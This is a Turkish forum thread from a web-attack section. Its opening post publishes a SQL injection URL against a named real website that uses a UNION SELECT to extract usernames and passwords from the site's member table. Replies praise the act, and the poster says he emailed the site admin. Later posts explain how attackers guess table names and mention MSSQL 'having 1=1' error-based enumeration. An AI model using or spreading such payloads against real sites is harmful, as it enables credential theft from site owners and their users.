Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri 
Www.Dergibi.Com - Sql İnjection (Username,Password) Www.Dergibi.Com - Sql İnjection (Username,Password)
-
http://www.dergibi.com/haber/ayrinti.asp?id=1 union select 0,1,username,3,4,password,6 from uyeler
-
cıx cıx cıx, siddetle kınıyorum :P
-
:D
-
helal olsun güzel iş.
devamını diliyorum. indexte basabilirsin ya alttan alma helal.
-
Takip ettiğim bir siteydi, güzel makaleler ve öyküler var.
''Helal Olsun'' luk birşey yok, gereksiz bir eylem.
-
Swool bunu yazdı:
-----------------------------Takip ettiğim bir siteydi, güzel makaleler ve öyküler var.
''Helal Olsun'' luk birşey yok, gereksiz bir eylem.
-----------------------------bir eylem yokki admine düzeltmesi için email bile gönderdim
eyleme girmek istesem indeks atarım :P
-
Site yöneticisine e-posta gönderip burada konu açmak pasif bir eylem mi?
-
şimdi merak ettiğim birşey var. sql injection olduğunu anladık diyelim. select 0,1,username,3,4,password,6 from uyeler burda tablo adlarını nasıl öğreniyoruz? sallayarak uyeler diye tablo olduğunu öğrenemeyiz galiba, üstüne tablodaki field ları yazmışsın, onları nerden öğrendin? yöntem nedir?
-
hotboy bunu yazdı:
-----------------------------
şimdi merak ettiğim birşey var. sql injection olduğunu anladık diyelim. select 0,1,username,3,4,password,6 from uyeler burda tablo adlarını nasıl öğreniyoruz? sallayarak uyeler diye tablo olduğunu öğrenemeyiz galiba, üstüne tablodaki field ları yazmışsın, onları nerden öğrendin? yöntem nedir?
-----------------------------sorunu yanlıs anlamamısımdır umarım.
tablo adları belirlidir zaten. Misal admin tbl_user tbl_admin user users admins vs gibi...
Url'den de kendini belli eder bazen, söyle ki siteadi.com/uyeler.asp?id=50' select null,null,name,pw,null uyeler/user/users seklinde cıkabilir...
-
Andrei bunu yazdı:
-----------------------------hotboy bunu yazdı:
-----------------------------
şimdi merak ettiğim birşey var. sql injection olduğunu anladık diyelim. select 0,1,username,3,4,password,6 from uyeler burda tablo adlarını nasıl öğreniyoruz? sallayarak uyeler diye tablo olduğunu öğrenemeyiz galiba, üstüne tablodaki field ları yazmışsın, onları nerden öğrendin? yöntem nedir?
-----------------------------sorunu yanlıs anlamamısımdır umarım.
tablo adları belirlidir zaten. Misal admin tbl_user tbl_admin user users admins vs gibi...
Url'den de kendini belli eder bazen, söyle ki siteadi.com/uyeler.asp?id=50' select null,null,name,pw,null uyeler/user/users seklinde cıkabilir...
-----------------------------olurmu hocam, adam icabında hfhgfshgfsh diye tablo açmış, url de bunu bildirmek zorunda değil, tablo adını öğrenmenin bi yolu varsa merak ettim.
-
hotboy bunu yazdı:
-----------------------------Andrei bunu yazdı:
-----------------------------hotboy bunu yazdı:
-----------------------------
şimdi merak ettiğim birşey var. sql injection olduğunu anladık diyelim. select 0,1,username,3,4,password,6 from uyeler burda tablo adlarını nasıl öğreniyoruz? sallayarak uyeler diye tablo olduğunu öğrenemeyiz galiba, üstüne tablodaki field ları yazmışsın, onları nerden öğrendin? yöntem nedir?
-----------------------------sorunu yanlıs anlamamısımdır umarım.
tablo adları belirlidir zaten. Misal admin tbl_user tbl_admin user users admins vs gibi...
Url'den de kendini belli eder bazen, söyle ki siteadi.com/uyeler.asp?id=50' select null,null,name,pw,null uyeler/user/users seklinde cıkabilir...
-----------------------------olurmu hocam, adam icabında hfhgfshgfsh diye tablo açmış, url de bunu bildirmek zorunda değil, tablo adını öğrenmenin bi yolu varsa merak ettim.
-----------------------------mssql veritabanında having 1=1 kodunu calıstırıp tablo adını alabiliyorduk yanlıs hatırlamıyorsam ama tam emin değilim.
sql injection konusunda detaylı makale var dökümanlar bölümünde bi kurcala hocam :)
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla